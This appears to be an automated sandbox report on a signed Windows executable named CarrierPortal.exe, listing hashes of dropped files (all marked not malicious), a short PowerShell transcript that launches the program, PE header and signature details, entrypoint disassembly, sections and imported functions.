                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\dxdiag.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):85405
                                                                  Entropy (8bit):5.206265703712478
                                                                  Encrypted:false
                                                                  SSDEEP:768:EP9JWMB5MBB+Q6Uc8FgGVoXX7lV6EMR57X3i0hG6gHCXkNEr+aL/FkJOlKwY0:E7cKOV2uRoxHtOu0
                                                                  MD5:5C63A7CF2A1A91BAE5BA2A87C3E7F397
                                                                  SHA1:8769B621B7601F912D160C3971E8EB99B74780CF
                                                                  SHA-256:BA2BA43ECB96261AD2376FBBAB59F074CDA7A42AF9034F0AEA704FFE1CB27BAE
                                                                  SHA-512:6F26A3CFB8A4AD86FD9F6BB1FCB08F3E7D3D68A6CD814C12FFBA3AA01557580105141249F5263AD8008E0CD7F60EFCD0E3CE21431F2262FDBF25576025B44561
                                                                  Malicious:false
                                                                  Preview:------------------..System Information..------------------.. Time of this report: 1/4/2025, 17:07:28.. Machine name: 320946.. Machine Id: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}.. Operating System: Windows 10 Pro 64-bit (10.0, Build 19045) (19041.vb_release.191206-1406).. Language: English (Regional Setting: English).. System Manufacturer: 2fmZyLfoncO4l1P.. System Model: B 1VhpWu.. BIOS: VMW201.00V.21805430.B64.2305221830 (type: UEFI).. Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (4 CPUs), ~2.0GHz.. Memory: 8192MB RAM.. Available OS Memory: 8192MB RAM.. Page File: 1477MB used, 6713MB available.. Windows Dir: C:\Windows.. DirectX Version: DirectX 12.. DX Setup Parameters: Not found.. User DPI Setting: 96 DPI (100 percent).. System DPI Setting: 96 DPI (100 percent).. DWM DPI Suserng: Disable
                                                                  Process:C:\Windows\System32\dxdiag.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):85405
                                                                  Entropy (8bit):5.206261750975624
                                                                  Encrypted:false
                                                                  SSDEEP:768:gP9JWMB5MBB+Q6Uc8FgGVoXX7lV6EMR57X3i0hG6gHCXkNEr+aL/FkJOlKwY0:g7cKOV2uRoxHtOu0
                                                                  MD5:FA248E8EA9D695CF75BD1A1EFE0ECE80
                                                                  SHA1:B092C86DACD3E95D938BC117AD722C1CCD639A8A
                                                                  SHA-256:0A3996B342B5D18ED2B88B3814EC0D7CCC013917E075E48DD5303869B33AF7E0
                                                                  SHA-512:A29B7338077FFED9074AF0A2B0DA1AC9207DCC68D5414B8AACA6E18CCC36D363F3C85D3F30C3E43ECF980A53B7F9F2886668982ABE6DA68CFCA662551D8E4B07
                                                                  Malicious:false
                                                                  Preview:------------------..System Information..------------------.. Time of this report: 1/4/2025, 17:08:21.. Machine name: 320946.. Machine Id: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}.. Operating System: Windows 10 Pro 64-bit (10.0, Build 19045) (19041.vb_release.191206-1406).. Language: English (Regional Setting: English).. System Manufacturer: 2fmZyLfoncO4l1P.. System Model: B 1VhpWu.. BIOS: VMW201.00V.21805430.B64.2305221830 (type: UEFI).. Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (4 CPUs), ~2.0GHz.. Memory: 8192MB RAM.. Available OS Memory: 8192MB RAM.. Page File: 1867MB used, 6323MB available.. Windows Dir: C:\Windows.. DirectX Version: DirectX 12.. DX Setup Parameters: Not found.. User DPI Setting: 96 DPI (100 percent).. System DPI Setting: 96 DPI (100 percent).. DWM DPI Suserng: Disable
                                                                  Process:C:\Users\user\Desktop\CarrierPortal.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):45
                                                                  Entropy (8bit):0.9111711733157262
                                                                  Encrypted:false
                                                                  SSDEEP:3:/lwlt7n:WNn
                                                                  MD5:C8366AE350E7019AEFC9D1E6E6A498C6
                                                                  SHA1:5731D8A3E6568A5F2DFBBC87E3DB9637DF280B61
                                                                  SHA-256:11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
                                                                  SHA-512:33C980D5A638BFC791DE291EBF4B6D263B384247AB27F261A54025108F2F85374B579A026E545F81395736DD40FA4696F2163CA17640DD47F1C42BC9971B18CD
                                                                  Malicious:false
                                                                  Preview:........................................J2SE.
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):37
                                                                  Entropy (8bit):4.195675662809303
                                                                  Encrypted:false
                                                                  SSDEEP:3:wov1xCQov:wov1xiv
                                                                  MD5:A0532016B03CEF83542FEE635609EF88
                                                                  SHA1:BE067DD6F4B13D403B0D5A9593353C2EAFD66C67
                                                                  SHA-256:2B5D9E3D3D06B74A6ACA12C41ECA9CDE450B6FF5042DD67B64DB4C6E20C78BC9
                                                                  SHA-512:686BE0692BAB02E6292EAA6EB8CCCBA6284997764CDA3A2C1278134B7DB7C0F1F838DF5CCB08728C85CE7D6F689BA3D36ACF14BF70DA9AD759E7D0FAC6C4F072
                                                                  Malicious:false
                                                                  Preview:cd .\Desktop\...\CarrierPortal.exe ..
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):5440
                                                                  Entropy (8bit):3.944331033257326
                                                                  Encrypted:false
                                                                  SSDEEP:96:l87RNO1GClFbakvMWJgmQbFHPJgmQbHe4:CVNArJgpJgG4
                                                                  MD5:41475B6E876C28154CFA553BD7DA484B
                                                                  SHA1:6D3D285486FFFD745A3C48E79A84EA447F3AD732
                                                                  SHA-256:6322AFEBE39DE209EFA6EE5953F60203E54993B687CAC8A23D652EB3B29B90B8
                                                                  SHA-512:ED7D41D3514BBD7E661C1B2411F8B1067AEC7628D07D036493589A012F64FE6FA01DA9E4E2220127934942B474F7AEB5A2E65FFA7E63CCB9569FFBD4E1D8FF8B
                                                                  Malicious:false
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):5440
                                                                  Entropy (8bit):3.944331033257326
                                                                  Encrypted:false
                                                                  SSDEEP:96:l87RNO1GClFbakvMWJgmQbFHPJgmQbHe4:CVNArJgpJgG4
                                                                  MD5:41475B6E876C28154CFA553BD7DA484B
                                                                  SHA1:6D3D285486FFFD745A3C48E79A84EA447F3AD732
                                                                  SHA-256:6322AFEBE39DE209EFA6EE5953F60203E54993B687CAC8A23D652EB3B29B90B8
                                                                  SHA-512:ED7D41D3514BBD7E661C1B2411F8B1067AEC7628D07D036493589A012F64FE6FA01DA9E4E2220127934942B474F7AEB5A2E65FFA7E63CCB9569FFBD4E1D8FF8B
                                                                  Malicious:false
                                                                  Preview:...................................FL..................F. .. ......{4...]....^..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........{4....b...^.......^......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.H$Z...............................A.p.p.D.a.t.a...B.V.1.....$Z...Roaming.@......FW.H$Z...........................}!..R.o.a.m.i.n.g.....\.1.....$Z...MICROS~1..D......FW.H$Z.............................O.M.i.c.r.o.s.o.f.t.....V.1.....GX*w..Windows.@......FW.H$Z............................[..W.i.n.d.o.w.s.......1.....FW.H..STARTM~1..n......FW.H$Z.....................D.....R=..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....FW.J..Programs..j......FW.H$Z.....................@......!r.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......FW.H$Z............................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......FW.H$Z......Q...........
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):842
                                                                  Entropy (8bit):5.088435793825327
                                                                  Encrypted:false
                                                                  SSDEEP:24:BxSAwrvvwdOx2DOaUWeWnKjekKKaX4CIym1ZJXZfM:BZovCOoOQnyqYB1Zo
                                                                  MD5:FC78BA90FDA82BEE09D449EEDAB4DECE
                                                                  SHA1:24570D0F570C8DC1EF610B40F025AF4596E6D79E
                                                                  SHA-256:90FD172F4A139F1E4D46D01648479F02B5D6B294DEFDCF54AE4B504B808725B1
                                                                  SHA-512:D94225C9E7C65130C4E73DF9522CF934A3EF3D9779BADD2FE56A261A36553DFAD5D5E218A69ACF911BA48B3467F1AA5D1381376D0055CE52905323772A2FE7D7
                                                                  Malicious:false
                                                                  Preview:.**********************..Windows PowerShell transcript start..Start time: 20250104170759..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 320946 (Microsoft Windows NT 10.0.19045.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe..Process ID: 3024..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1682..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20250104171336..**********************..PS C:\Users\user> cd .\Desktop\..**********************..Command start time: 20250104171346..**********************..PS C:\Users\user\Desktop> .\CarrierPortal.exe ..
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with very long lines (824), with no line terminators, with escape sequences
                                                                  Category:dropped
                                                                  Size (bytes):824
                                                                  Entropy (8bit):3.9418953353089767
                                                                  Encrypted:false
                                                                  SSDEEP:24:5O2OZO52OrOAO9OwdnV0GoMjbMjwgjkgjRLgj9gj3gj/Ugj8gjWgj5gjXgjbMjaz:ct85tyjgOskgwgVg5gjgzUgwgyglgbgN
                                                                  MD5:A39DEC971253BD18D2B28CB2B3EDD70F
                                                                  SHA1:3F9CB8DE24C84A38FEC2CE8F9DEDF354003043FF
                                                                  SHA-256:E05E916FEBEAF8873086E58BA86FB79F0551671316B3F6505A43C1669E04CE8A
                                                                  SHA-512:F084893A82FF22E3F817CA29A9EA50785A6CC98FEEE5634D0FDADC9DC94A915B494796F5271E04E5BFD68E4DBE2804BE59F2A7E05A5001A362A9F6768D678A27
                                                                  Malicious:false
                                                                  Preview:.[93mc.[33m.[45m.[0m.[93mcd.[33m.[45m.[0m.[93mcd.[33m.[45m .[33m.[45m.[0m.[93mcd.[33m.[45m .[33mD.[33m.[45m.[0m.[93mcd.[33m.[45m .[33mDe.[33m.[45m.[0m.[93mcd.[33m.[45m .[33mDes.[33m.[45m.[0m.[93mcd.[33m.[45m .[33mDesk.[33m.[45m.[0m.[93mcd.[33m.[45m .[33m.\Desktop\.[33m.[45m.[0m.[93mC.[33m.[45m.[0m.[93mCa.[33m.[45m.[0m.[93mCar.[33m.[45m.[0m.[93mCarr.[33m.[45m.[0m.[93m.\CarrierPortal.exe.[33m.[45m.[0m.[93m.\CarrierPortal.ex.[33m.[45m .[0m.[93m.\CarrierPortal.e.[33m.[45m .[0m.[93m.\CarrierPortal..[33m.[45m .[0m.[93m.\CarrierPortal.[33m.[45m .[0m.[93m.\CarrierPorta.[33m.[45m .[0m.[93m.\CarrierPort.[33m.[45m .[0m.[93m.\CarrierPor.[33m.[45m .[0m.[93m.\CarrierPo.[33m.[45m .[0m.[93m.\CarrierP.[33m.[45m .[0m.[93m.\Carrier.[33m.[45m .[0m.[93m.\CarrierPortal.exe.[33m.[45m.[0m.[93m.\CarrierPortal.exe.[33m.[45m .[33m.[45m.[0m
                                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Entropy (8bit):6.405360296456165
                                                                  TrID:
                                                                  • Win64 Executable GUI (202006/5) 92.65%
                                                                  • Win64 Executable (generic) (12005/4) 5.51%
                                                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                                                  • DOS Executable Generic (2002/1) 0.92%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:CarrierPortal.exe
                                                                  File size:21'461'272 bytes
                                                                  MD5:4c6d58378be4b9051debfb5670f5b82c
                                                                  SHA1:851cc9c8753aa28ad94123e642b34d778d8fe30e
                                                                  SHA256:19b883fd205513f2c8d7933a35ff86c63194312a75a6ff9a83a1c649b55603da
                                                                  SHA512:5544107324d54c21e0a3c981753b1be3ff845b29c3ef813a3278bfa0b5b64bc1f54e3e54bda8f32334b407123ba7bc7c4ea637b4b27baa3198aacb5010690a92
                                                                  SSDEEP:196608:LQ7Ep9oIyFUHd36t0ICh9NgWRypXQdKP3RvuEGxINPzD:LuEpI+Hd3o0ICDElHPwEKU/
                                                                  TLSH:9D277D23E6CD09D0C4ABA0BD9851C2B27B73F44187302BD79A5D661B9C7B6F04A3D366
                                                                  File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......?.[.{.5.{.5.{.5.r...i.5.j<4...5.j<6...5.j<1.q.5.j<..z.5.b.0.z.5.b.1.C.5.0.1.z.5.0.4.b.5.{.4...5.j<0.e.5.{.5.z.5..<5.z.5..<7.z.5
                                                                  Icon Hash:72eaa2aaa2a2a292
                                                                  Entrypoint:0x14085aa9c
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:true
                                                                  Imagebase:0x140000000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x67702F45 [Sat Dec 28 17:03:01 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:6
                                                                  OS Version Minor:0
                                                                  File Version Major:6
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:6
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:bd223072972bb1a268da4d5ee34bbdee
                                                                  Signature Valid:true
                                                                  Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                  Signature Validation Error:The operation completed successfully
                                                                  Error Number:0
Not Before | Not After
• 23/12/2024 01:39:22 | 24/12/2025 01:39:22
                                                                  Subject Chain
                                                                  • CN="Shanghai Linyao Network Technology Co., Ltd.", O="Shanghai Linyao Network Technology Co., Ltd.", L=Shanghai, S=Shanghai, C=CN, OID.1.3.6.1.4.1.311.60.2.1.2=Shanghai, OID.1.3.6.1.4.1.311.60.2.1.3=CN, SERIALNUMBER=91310120MA1HY6532E, OID.2.5.4.15=Private Organization
                                                                  Version:3
                                                                  Thumbprint MD5:696903EA9860DCB5291CD07F6881DEF3
                                                                  Thumbprint SHA-1:8E58D9B00A6A43FC5057D22856E7564F77014B3E
                                                                  Thumbprint SHA-256:5085437F5032374D5CC5D60219FB86AA9ABBFCD74682283A5D50AD5470F62023
                                                                  Serial:6F30117FEED4D9B367D9A42D
                                                                  Instruction
                                                                  dec eax
                                                                  sub esp, 28h
                                                                  call 00007FBF68E292B8h
                                                                  dec eax
                                                                  add esp, 28h
                                                                  jmp 00007FBF68E28A97h
                                                                  int3
                                                                  int3
                                                                  dec eax
                                                                  sub esp, 28h
                                                                  dec ebp
                                                                  mov eax, dword ptr [ecx+38h]
                                                                  dec eax
                                                                  mov ecx, edx
                                                                  dec ecx
                                                                  mov edx, ecx
                                                                  call 00007FBF68E28C32h
                                                                  mov eax, 00000001h
                                                                  dec eax
                                                                  add esp, 28h
                                                                  ret
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  inc eax
                                                                  push ebx
                                                                  inc ebp
                                                                  mov ebx, dword ptr [eax]
                                                                  dec eax
                                                                  mov ebx, edx
                                                                  inc ecx
                                                                  and ebx, FFFFFFF8h
                                                                  dec esp
                                                                  mov ecx, ecx
                                                                  inc ecx
                                                                  test byte ptr [eax], 00000004h
                                                                  dec esp
                                                                  mov edx, ecx
                                                                  je 00007FBF68E28C35h
                                                                  inc ecx
                                                                  mov eax, dword ptr [eax+08h]
                                                                  dec ebp
                                                                  arpl word ptr [eax+04h], dx
                                                                  neg eax
                                                                  dec esp
                                                                  add edx, ecx
                                                                  dec eax
                                                                  arpl ax, cx
                                                                  dec esp
                                                                  and edx, ecx
                                                                  dec ecx
                                                                  arpl bx, ax
                                                                  dec edx
                                                                  mov edx, dword ptr [eax+edx]
                                                                  dec eax
                                                                  mov eax, dword ptr [ebx+10h]
                                                                  mov ecx, dword ptr [eax+08h]
                                                                  dec eax
                                                                  mov eax, dword ptr [ebx+08h]
                                                                  test byte ptr [ecx+eax+03h], 0000000Fh
                                                                  je 00007FBF68E28C2Dh
                                                                  movzx eax, byte ptr [ecx+eax+03h]
                                                                  and eax, FFFFFFF0h
                                                                  dec esp
                                                                  add ecx, eax
                                                                  dec esp
                                                                  xor ecx, edx
                                                                  dec ecx
                                                                  mov ecx, ecx
                                                                  pop ebx
                                                                  jmp 00007FBF68E28C3Ah
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  nop word ptr [eax+eax+00000000h]
                                                                  dec eax
                                                                  cmp ecx, dword ptr [0000F379h]
                                                                  jne 00007FBF68E28C32h
                                                                  dec eax
                                                                  rol ecx, 10h
                                                                  test cx, FFFFh
                                                                  jne 00007FBF68E28C23h
                                                                  ret
                                                                  dec eax
                                                                  ror ecx, 10h
                                                                  jmp 00007FBF68E28C5Bh
                                                                  int3
                                                                  int3
                                                                  inc eax
                                                                  push ebx
                                                                  dec eax
                                                                  Programming Language:
                                                                  • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x864ac0 | 0x6e8 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8651a8 | 0x1b8 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x146a000 | 0xbeba | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x86b000 | 0x129c | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1475000 | 0x2918 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1453000 | 0x1645c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8633d0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x863290 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x85d000 | 0xa08 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x85b074 | 0x85c000 | b101ef2120b0c8c887a2fdfd8d53d6c0 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x85d000 | 0xa3d6 | 0xb000 | 45f060318aa2ec0d8e77c7e9736c9d94 | False | 0.4588068181818182 | data | 5.505615230517115 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x868000 | 0x2d60 | 0x2000 | 55bf45fa81bfdb4461bbf688890e44b6 | False | 0.3392333984375 | data | 4.493580682706173 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x86b000 | 0x129c | 0x2000 | 3e92dc768c493fd1a309669d7735dd9f | False | 0.2974853515625 | data | 3.695391900653071 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rodata | 0x86d000 | 0x5c70 | 0x6000 | 437b9b02463872861b8cd4ae28aca530 | False | 0.66943359375 | data | 6.620112337113049 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.svm_hea | 0x873000 | 0xbe0000 | 0xbe0000 | bf4de0a0dea31ccec134df2461c35b2a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x1453000 | 0x1645c | 0x17000 | 2581b25fdbf89b8e759d07a3e75a1d09 | False | 0.09899371603260869 | data | 5.4326678463199185 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x146a000 | 0xbeba | 0xc000 | bf8c395cef634d6cf94810a8a6c1a0a3 | False | 0.19541422526041666 | data | 4.147721876175453 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x146a1f8 | 0x14c4 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9787434161023326
RT_ICON | 0x146b6bc | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 0 | | | 0.07599196976854039
RT_ICON | 0x146f8e4 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.10622406639004149
RT_ICON | 0x1471e8c | 0x1a68 | Device independent bitmap graphic, 40 x 80 x 32, image size 0 | | | 0.13624260355029585
RT_ICON | 0x14738f4 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.15666041275797374
RT_ICON | 0x147499c | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | | | 0.2069672131147541
RT_ICON | 0x1475324 | 0x6b8 | Device independent bitmap graphic, 20 x 40 x 32, image size 0 | | | 0.2819767441860465
RT_ICON | 0x14759dc | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.3280141843971631
RT_GROUP_ICON | 0x1475e44 | 0x76 | data | | | 0.7457627118644068
DLL | Import
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
ADVAPI32.dll | RegEnumKeyExA, RegOpenKeyExA, RegOpenKeyExW, GetUserNameW, OpenProcessToken, RegQueryInfoKeyA, RegQueryValueExA, RegQueryValueExW, CryptAcquireContextA, CryptReleaseContext, CryptGenRandom, CryptGenKey, CryptDestroyKey, CryptSetKeyParam, CryptGetKeyParam, CryptSetHashParam, CryptGetProvParam, CryptGetUserKey, CryptExportKey, CryptImportKey, CryptEncrypt, CryptDecrypt, CryptCreateHash, CryptDestroyHash, CryptSignHashA, CryptVerifySignatureA, RegCloseKey
WS2_32.dll | freeaddrinfo, __WSAFDIsSet, getaddrinfo, send, recv, ioctlsocket, getnameinfo, WSAStartup, getsockname, WSAAddressToStringA, WSAEventSelect, WSASend, WSARecv, recvfrom, WSASocketW, WSAEnumProtocolsW, WSAIoctl, WSAGetLastError, gethostname, setsockopt, htons, htonl, getsockopt, connect, shutdown, WSASetLastError, closesocket, bind, ntohs, ntohl, select, socket, listen, WSACleanup, accept
USERENV.dll | GetUserProfileDirectoryW
KERNEL32.dll | FindNextFileW, GetDriveTypeW, GetFileAttributesW, GetFileAttributesExW, GetFileInformationByHandle, GetFullPathNameW, RemoveDirectoryW, SetEndOfFile, CreateIoCompletionPort, DeviceIoControl, FormatMessageW, GetHandleInformation, GetQueuedCompletionStatusEx, InitializeSRWLock, ReleaseSRWLockExclusive, WideCharToMultiByte, AcquireSRWLockExclusive, AcquireSRWLockShared, DeleteCriticalSection, InitOnceExecuteOnce, GetTickCount64, GetModuleHandleW, SetFileCompletionNotificationModes, GetFileTime, GetModuleHandleExW, GetEnvironmentStrings, GetEnvironmentStringsW, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WaitForMultipleObjects, GetProcessTimes, GetCurrentProcessId, TerminateProcess, GetExitCodeProcess, OpenProcess, CreateToolhelp32Snapshot, Process32First, Process32Next, CreatePipe, CreateProcessW, GetProcessId, GetConsoleWindow, GetFileType, PeekNamedPipe, GetNumberOfConsoleInputEvents, PeekConsoleInputA, FindFirstFileW, GetSystemTimeAsFileTime, GetProcessAffinityMask, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, InitializeSListHead, IsDebuggerPresent, SetLastError, FormatMessageA, LocalFree, GetUserDefaultLCID, GetUserGeoID, FindClose, GetGeoInfoA, GetLocaleInfoA, MultiByteToWideChar, GetDynamicTimeZoneInformation, GetTimeZoneInformation, WriteFile, WakeAllConditionVariable, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, UnmapViewOfFile, DeleteFileW, CreateDirectoryW, ReOpenFile, SetFilePointerEx, ReadFile, GetFileSizeEx, GetDiskFreeSpaceW, VerifyVersionInfoW, SetHandleInformation, VerSetConditionMask, SwitchToThread, SleepConditionVariableCS, Sleep, SetEvent, ResetEvent, QueryPerformanceFrequency, QueryPerformanceCounter, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, InitializeConditionVariable, GlobalMemoryStatusEx, GetWindowsDirectoryW, GetVersionExA, GetTempPathW, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameW, GetLastError, GetCurrentThreadId, GetCurrentThread, GetCurrentProcess, GetCurrentDirectoryW, FlushFileBuffers, EnterCriticalSection, DuplicateHandle, CreateFileW, CreateFileMappingW, CreateEventA, CloseHandle, AddVectoredContinueHandler, GlobalFree, ReleaseSRWLockShared
VCRUNTIME140.dll | __current_exception, _local_unwind, __C_specific_handler, __std_exception_destroy, __current_exception_context, wcsrchr, wcschr, memset, memcpy, _CxxThrowException, __std_exception_copy, wcsstr
VCRUNTIME140_1.dll | __CxxFrameHandler4
api-ms-win-crt-runtime-l1-1-0.dll | _seh_filter_exe, abort, _configure_narrow_argv, _initialize_narrow_environment, _get_initial_narrow_environment, _initterm, _initterm_e, __p___argc, _cexit, _c_exit, _register_thread_local_exe_atexit_callback, _exit, _initialize_onexit_table, _register_onexit_function, _crt_atexit, terminate, __p___argv, exit, _errno, _beginthreadex, _set_app_type
api-ms-win-crt-string-l1-1-0.dll | towupper, wcscpy, wcscat, iswctype, strncpy, _strdup, strcat, strcpy, wcstok_s, wcsncmp, wcscmp, _wcsdup, _wcsupr, wcsncat, wcslen, isdigit, strlen, strcmp
api-ms-win-crt-environment-l1-1-0.dll | _wgetcwd, _wgetdcwd, _wgetenv, getenv
api-ms-win-crt-heap-l1-1-0.dll | malloc, _callnewh, realloc, free, calloc, _set_new_mode
api-ms-win-crt-convert-l1-1-0.dll | strtoull, wcstombs
api-ms-win-crt-stdio-l1-1-0.dll | __stdio_common_vfprintf, __stdio_common_vsprintf, __stdio_common_vswprintf, __stdio_common_vswscanf, __acrt_iob_func, fputs, __p__commode, _set_fmode, fflush
api-ms-win-crt-filesystem-l1-1-0.dll | _wfullpath
